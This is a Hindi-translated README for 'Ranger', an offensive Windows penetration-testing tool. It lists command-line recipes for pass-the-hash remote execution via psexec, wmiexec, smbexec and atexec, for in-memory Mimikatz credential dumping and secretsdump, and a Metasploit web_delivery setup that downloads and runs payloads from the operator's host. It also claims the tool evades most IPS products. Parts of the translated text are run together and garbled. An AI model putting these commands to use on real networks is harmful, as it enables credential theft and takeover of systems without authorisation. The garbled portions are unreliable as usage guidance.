
सुरक्षा पेशेवरों के लिए एक उपकरण जो रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुँचने और उनके साथ बातचीत करने के लिए है।
सुरक्षा पेशेवरों को रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुंचने और उनके साथ बातचीत करने में सहायता करने के लिए एक उपकरण।
यह परियोजना इस सोच के साथ बनाई गई थी, हमने धनुष या तीर का आविष्कार नहीं किया, बल्कि इसका उपयोग करने का एक अधिक कुशल तरीका बनाया।
Ranger एक कमांड-लाइन संचालित हमले और पैठ परीक्षण उपकरण है, जिसमें विंडोज सिस्टम के खिलाफ क्षमताओं को वितरित करने के लिए एक तत्काल कैटपल्ट सर्वर का उपयोग करने की क्षमता है। जब तक किसी उपयोगकर्ता के पास क्रेडेंशियल्स या हैश सेट (NTLM, LM, LM:NTLM) होता है, वह उन सिस्टमों तक पहुंच प्राप्त कर सकता है जो ट्रस्ट का हिस्सा हैं।
इस क्षमता का उपयोग करके एक सुरक्षा पेशेवर मेमोरी से क्लियर-टेक्स्ट में क्रेडेंशियल्स निकाल सकता है, SAM टेबल्स तक पहुंच सकता है, कमांड चला सकता है, PowerShell स्क्रिप्ट, विंडोज बाइनरी, और अन्य उपकरण निष्पादित कर सकता है। इस समय, यह उपकरण अधिकांश IPS विक्रेता समाधानों को बायपास करता है जब तक कि उन्हें विशेष रूप से इसका पता लगाने के लिए ट्यून नहीं किया गया हो। यह उपकरण हमारे होम लैब्स का उपयोग करके विकसित किया गया था, ताकि कानूनी और/या अनुबंधित रूप से समर्थित गतिविधियों को करने वाले सुरक्षा पेशेवरों का समर्थन किया जा सके।
अधिक कार्यक्षमता जोड़ी जा रही है, लेकिन इस समय यह उपकरण PowerShell PowerView, PowerShell Mimikatz और Impacket टीमों से संबंधित रिपॉजिटरी के समुदाय योगदानों का उपयोग करता है।
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh
ranger --update
--scout
--secrets-dump
--wmiexec
--psexec
--smbexec
--atexec
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access
##कमांड निष्पादन: ###लॉग इन उपयोगकर्ता खोजें:
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout
###SMBEXEC कमांड शेल:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv
###PSEXEC कमांड शेल:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv
###PSEXEC कमांड निष्पादन:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv
###WMIEXEC कमांड निष्पादन:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"
###WMIEXEC PowerShell Mimikatz मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker
###WMIEXEC Metasploit web_delivery मेमोरी इंजेक्टर (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader
###WMIEXEC कस्टम कोड मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"
###ATEXEC कमांड निष्पादन:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder
###ATEXEC PowerShell Mimikatz मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder
###ATEXEC Metasploit web_delivery मेमोरी इंजेक्टर (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder
###ATEXEC कस्टम कोड मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder
###SECRETSDUMP कस्टम कोड मेमोरी इंजेक्टर:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump
###पेस्ट करने योग्य Mimikatz हमला बनाएं:
ranger.py --invoker -q -v -vv -vvv
###पेस्ट करने योग्य web_delivery हमला बनाएं (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):
ranger.py --downloader -q -v -vv -vvv
###पेस्ट करने योग्य Executor हमला बनाएं:
ranger.py --executor -q -v -vv -vvv
--get-domain-membership के साथ वास्तविक क्वेरी डोमेन का निर्धारण करें--domain का उपयोग करें, जो आपको उस डोमेन से अलग डोमेन को लक्षित करने की अनुमति देता है जिसमें आपने लॉगिन किया थाranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"
##उपयोग के बारे में नोट्स: ###क्रेड फ़ाइल फ़ॉर्मेट:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain
###क्रेडेंशियल फ़ाइल चेतावनियां:
-d के माध्यम से डोमेन नाम प्रदान करते हैं, तो यह अनुमान लगाएगा कि आप फ़ाइल में सभी डोमेन नामों को अनदेखा करना चाहते हैं।###कमांड लाइन निष्पादन:
password
LM:NTLM
:NTLM
PWDUMP
###लक्ष्य और बहिष्करण:
####लक्ष्य, लक्ष्य श्रेणियाँ, लक्ष्य CIDRs, लक्ष्य सूचियाँ, NMAP XML लक्ष्य:
-t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml####बहिष्करण, बहिष्करण श्रेणियाँ, बहिष्करण CIDRs, बहिष्करण सूचियाँ, Nmap XML बहिष्करण:
t को e से बदलें-e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml-f के साथ बदला जा सकता है-a के साथ बदला जा सकता है-f और -a दोनों विकल्पों की आवश्यकता होती है, -a से बचने के लिए आप Executor का उपयोग कर सकते हैं-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x के साथ करने की आवश्यकता है-f द्वारा परिभाषित करने की आवश्यकता है-a के साथ कमांड को और परिभाषित कर सकते हैं-x "im.ps1" -f "Invoke-Mimikatz" -a "DumpCreds"-x "im.ps1" -f "Invoke-Mimikatz -DumpCredsuse exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j
##FAQ
###SMBEXEC और WMIEXEC के लिए पहुंच अस्वीकृत त्रुटियाँ मुझे उन विंडोज मशीनों पर पहुंच अस्वीकृत त्रुटियाँ मिल रही हैं जो WORKGROUP का हिस्सा हैं।
जब कोई डोमेन का हिस्सा नहीं है, तो विंडोज डिफ़ॉल्ट रूप से कोई प्रशासनिक शेयर नहीं रखता है। SMBEXEC शेयरों के सक्षम होने पर निर्भर करता है। इसके अलावा, WORKGROUP मशीनों पर WMIC सक्षम नहीं है। SMBEXEC और WMIEXEC डोमेन सिस्टम पर सक्षम प्रोटोकॉल को लक्षित करने के लिए बनाए गए हैं। जबकि WORKGROUP सिस्टम पर इन कार्यों को सक्षम करना निश्चित रूप से संभव है, ध्यान दें कि आप असुरक्षित प्रोटोकॉल पेश कर रहे हैं (आखिरकार, यही इस उपकरण को हमला करने के लिए बनाया गया है)। अपने प्राथमिक घरेलू सिस्टम पर जिसका उपयोग आपका जीवनसाथी Facebook के लिए करता है, इन सुविधाओं को सक्षम करना शायद सबसे अच्छा विचार नहीं है।
enum4linux जैसे उपकरण का उपयोग कर सकते हैं और फिर SMBEXEC को निष्पादित करने का प्रयास करने के लिए ranger में --share share_name तर्क का उपयोग कर सकते हैं।https://pypi.python.org/pypi/colorama के साथ रंगीन आउटपुट जोड़ना जारी रखें#धन्यवाद:
[BSides Charm City 2016: April 23, 2016] (http://2016.bsidescharm.com/2016-talks/ranger-it-just-takes-one-account-to-take-down-an-enterprise)
[वीडियो] (https://youtu.be/HrXTrPzdR2Q?list=PL0YXeUocWA4NAGPmYdKNmQEh8H6iL_4Ik)
[Black Arch Linux] (https://blackarch.org/)